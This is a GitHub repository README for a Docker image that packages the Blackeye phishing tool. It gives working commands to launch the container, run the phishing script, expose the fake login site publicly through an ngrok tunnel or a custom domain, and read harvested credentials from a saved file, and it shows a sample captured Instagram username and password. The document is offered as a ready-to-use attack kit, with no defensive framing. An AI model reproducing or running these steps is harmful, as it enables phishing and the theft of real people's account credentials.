Skip to content

Docker container for creating the phishing sites using Blackeye

Notifications You must be signed in to change notification settings

sasqwatch/docker-blackeye

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

docker-blackeye

Docker container for running the phishing attack using Blackeye

Blackeye is a Phishing Tool, with 32 templates +1 customizable.

It is developed by thelinuxchoice

I am creating a docker container where you can run blackeye in any platform.

Usage:


docker run -d --name blackeye vishnunair/docker-blackeye:latest

Login to the docker container like below: and execute the blackeye script

docker exec -it blackeye bash

root@44792c30b279:/src/blackeye# bash blackeye.sh

If you don't see the Ngrok Link, open another terminal and run the below command

docker exec -it blackeye bash

root@44792c30b279:/src/blackeye# ./ngrok http 3333

If everything goes well, you can see the phishing site like below: You can create custom domain and point it to the Ngrok

The credentials are saved under the sites directory


root@44792c30b279:/src/blackeye# cat sites/instagram/saved.usernames.txt
Account: gskkfkkf Pass: k86786632jd


About

Docker container for creating the phishing sites using Blackeye

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Shell 98.2%
  • Dockerfile 1.8%